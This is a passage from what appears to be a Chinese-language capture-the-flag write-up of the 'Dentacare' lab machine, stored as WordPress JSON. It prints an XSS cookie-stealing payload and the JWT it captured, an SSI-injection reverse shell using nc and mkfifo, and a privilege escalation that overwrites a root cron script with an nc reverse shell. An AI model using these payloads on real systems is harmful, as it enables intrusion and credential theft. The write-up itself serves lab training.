src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528193550258\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5<a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/xss-cross-site-scripting#retrieve-cookies\">\u7a83\u53d6cookie<\/a>\uff1a<\/p>\n<pre><code class=\"language-bash\">&lt;img src=x onerror=this.src=&quot;http:\/\/172.20.10.8:8888\/?c=&quot;+document.cookie&gt;<\/code><\/pre>\n<p>\u7136\u540e\u63a5\u6536\uff0c\u8010\u5fc3\u7b49\u5f85\u4e00\u4f1a\u5373\u53ef\u6536\u5230\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n172.20.10.4 - - [28\/May\/2024 07:50:03] &quot;GET \/?c=Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJEZW50YUNhcmUgQ29ycG9yYXRpb24gIiwiaWF0IjoxNzEyNTc0NTEyLCJleHAiOjE3NDQxMTA1MTIsImF1ZCI6ImRlbnRhY2FyZS5obXYiLCJzdWIiOiJoZWxwZGVza0BkZW50YWNhcmUuaG12IiwiR2l2ZW5OYW1lIjoiUGF0cmljayIsIlN1cm5hbWUiOiJQZXRpdCIsIkVtYWlsIjoiYWRtaW5AZGVudGFjYXJlLmhtdiIsIlJvbGUiOlsiQWRtaW5pc3RyYXRvciIsIlByb2plY3QgQWRtaW5pc3RyYXRvciJdfQ.FIMxmUCOL3a4ThN5z-7VDN8OxBK7W0krHlcVktAiZtx3KXSQsbno1q1MRUL9JMPTJeqoTr-bRL2KWyr5Kv7JnQ HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<h3>\u66ff\u6362cookie\u767b\u5f55<\/h3>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u66ff\u6362<code>cookie<\/code>\u767b\u5f55\u4e4b\u524d\u90a3\u4e2a<code>8000<\/code>\u7aef\u53e3\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101692.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101692.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528195456197\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u53cd\u5f39shell<\/h3>\n<p>\u5148\u8bd5\u63a2\u4e00\u4e0b\u8fd9\u4e2a\u73a9\u610f\u662f\u5426\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101693.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101693.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528195626967\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101694.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101694.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528200104764\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u6587\u4ef6\u683c\u5f0f\u4e3a<code>shtml<\/code>\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101695.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101695.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528200215774\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u7ee7\u7eed\u67e5\u770b\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/pentesting-web\/server-side-inclusion-edge-side-inclusion-injection#server-side-inclusion-basic-information\">https:\/\/book.hacktricks.xyz\/pentesting-web\/server-side-inclusion-edge-side-inclusion-injection#server-side-inclusion-basic-information<\/a><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u53cd\u5f39shell\u65b9\u6cd5\uff1a<\/p>\n<pre><code>&lt;!--#exec cmd=&quot;mkfifo \/tmp\/foo;nc 172.20.10.8 1234 0&lt;\/tmp\/foo|\/bin\/bash 1&gt;\/tmp\/foo;rm \/tmp\/foo&quot; --&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101696.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101696.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528200729844\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5f39\u8fc7\u6765\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101697.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101697.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528200745635\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@dentacare:\/var\/www\/html$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@dentacare:\/var\/www\/html$ ls -la\ntotal 28\ndrwxr-xr-x 2 www-data www-data 4096 Apr 14 08:02 .\ndrwxr-xr-x 3 root     root     4096 Apr  9 19:08 ..\n-rw-r--r-- 1 root     root      537 Apr 14 08:01 .htaccess\n-rw-r--r-- 1 www-data www-data  268 Apr 12 20:04 gen.php\n-rw-r--r-- 1 www-data www-data  347 Apr 12 20:04 index.shtml\n-rw-r--r-- 1 www-data www-data  183 May 28 14:07 patient_name.shtml\n-rw-r--r-- 1 www-data www-data   95 Apr 12 20:04 process.php\n(remote) www-data@dentacare:\/var\/www\/html$ cat gen.php \n&lt;?php\n\n$userCommand = $_GET[&#039;cmd&#039;] ?? &#039;echo Pas de commande sp\u00e9cifi\u00e9e&#039;;\n\nfile_put_contents(&#039;patient_name.shtml&#039;, &quot;&lt;html&gt;&lt;body&gt;&lt;h1&gt;Patient with unpaid balance added to database :&lt;\/h1&gt;\\&quot;$userCommand\\&quot;&lt;\/body&gt;&lt;\/html&gt;&quot;);\n\nheader(&quot;Location: patient_name.shtml&quot;);\nexit;\n?&gt;\n(remote) www-data@dentacare:\/var\/www\/html$ cat process.php \n&lt;?php\n$userInput = $_GET[&#039;query&#039;] ?? &#039;&#039;;\n\nheader(&quot;Location: hello.shtml?$userInput&quot;);\nexit;\n?&gt;\n(remote) www-data@dentacare:\/var\/www\/html$ sudo -l\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@dentacare:\/var\/www\/html$ crontab -l\nno crontab for www-data\n(remote) www-data@dentacare:\/var\/www\/html$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndentist:x:1000:1000:,,,:\/home\/dentist:\/bin\/bash\n(remote) www-data@dentacare:\/var\/www\/html$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly; }\n#\n(remote) www-data@dentacare:\/var\/www\/html$ cd \/home\/dentist\/\nbash: cd: \/home\/dentist\/: Permission denied\n(remote) www-data@dentacare:\/var\/www\/html$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/passwd\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/lib\/authbind\/helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) www-data@dentacare:\/var\/www\/html$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\n<p>\u5c1d\u8bd5\u7529<code>linpeas.sh<\/code>\u8fdb\u53bb\u4ee5\u53ca<code>pspy64<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101698.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101698.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528202035848\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><code>pspy64<\/code>\u4e00\u76f4\u51fa\u9519\uff0c\u53ea\u80fd\u624b\u52a8\u67e5\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101699.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101699.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528203125629\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5b58\u5728\u5b9a\u65f6\u4efb\u52a1\uff0c\u4e14\u5177\u6709\u5199\u7684\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@dentacare:\/tmp$ ls -l \/opt\/appli\/.config\/read_comment.js\n-rw-r--r-- 1 www-data www-data 1063 Apr 12 20:04 \/opt\/appli\/.config\/read_comment.js<\/code><\/pre>\n<p>\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-bash\">require(&#039;child_process&#039;).exec(&#039;nc -e \/bin\/bash 192.168.0.143 1234&#039;)<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) www-data@dentacare:\/tmp$ cd \/opt\/appli\/.config\/\n(remote) www-data@dentacare:\/opt\/appli\/.config$ cat read_comment.js \nconst puppeteer = require(&#039;puppeteer&#039;);\n\n(async () =&gt; {\n    const browser = await puppeteer.launch({\n        headless: true,\n        args: [&#039;--no-sandbox&#039;, &#039;--disable-setuid-sandbox&#039;]\n    });\n    const page = await browser.newPage();\n\n    const cookies = [{\n        &#039;name&#039;: &#039;Authorization&#039;,\n        &#039;value&#039;: &#039;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJEZW50YUNhcmUgQ29ycG9yYXRpb24gIiwiaWF0IjoxNzEyNTc0NTEyLCJleHAiOjE3NDQxMTA1MTIsImF1ZCI6ImRlbnRhY2FyZS5obXYiLCJzdWIiOiJoZWxwZGVza0BkZW50YWNhcmUuaG12IiwiR2l2ZW5OYW1lIjoiUGF0cmljayIsIlN1cm5hbWUiOiJQZXRpdCIsIkVtYWlsIjoiYWRtaW5AZGVudGFjYXJlLmhtdiIsIlJvbGUiOlsiQWRtaW5pc3RyYXRvciIsIlByb2plY3QgQWRtaW5pc3RyYXRvciJdfQ.FIMxmUCOL3a4ThN5z-7VDN8OxBK7W0krHlcVktAiZtx3KXSQsbno1q1MRUL9JMPTJeqoTr-bRL2KWyr5Kv7JnQ&#039;,\n        &#039;url&#039;: &#039;http:\/\/localhost:80&#039;\n    }];\n\n    await page.setCookie(...cookies);\n\n    await page.goto(&#039;http:\/\/localhost:80\/view-all-comments&#039;);\n\n    console.log(`Page visit\u00e9e avec cookie sp\u00e9cifi\u00e9 \u00e0 ${new Date().toISOString()}`);\n\n    await page.waitForTimeout(10000);\n\n    await browser.close();\n})();\n(remote) www-data@dentacare:\/opt\/appli\/.config$ cp read_comment.js read_comment.js.bak\n(remote) www-data@dentacare:\/opt\/appli\/.config$ echo &#039;require(&quot;child_process&quot;).exec(&quot;nc -e \/bin\/bash 172.20.10.8 2345&quot;)&#039; &gt; read_comment.js<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101700.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405282101700.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240528204229504\" \/><\/div><\/p>\n<p>\u5f39\u56de\u6765\u4e86\uff01\u548c\u4f5c\u8005\u505a\u6cd5\u622a\u7136\u4e0d\u4e00\u6837\uff0c\u7406\u60f3\u89e3\u6cd5\u53ef\u4ee5\u53c2\u8003\u4f5c\u8005\u7684wp\uff0c\u4e0b\u9762\u7b2c\u4e00\u4e2a\u3002<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=PPJOF-89KLQ\">https:\/\/www.youtube.com\/watch?v=PPJOF-89KLQ<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1Ti421S7tt\/\">https:\/\/www.bilibili.com\/video\/BV1Ti421S7tt\/<\/a><\/p>\n<p><a href=\"http:\/\/162.14.82.114\/index.php\/471\/03\/28\/2024\/\">http:\/\/162.14.82.114\/index.php\/471\/03\/28\/2024\/<\/a><\/p>\n<p><a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/werkzeug\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-web\/werkzeug<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dentacare \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/dentacare] \u2514 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-685","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/685","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=685"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/685\/revisions"}],"predecessor-version":[{"id":686,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/685\/revisions\/686"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=685"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=685"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=685"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}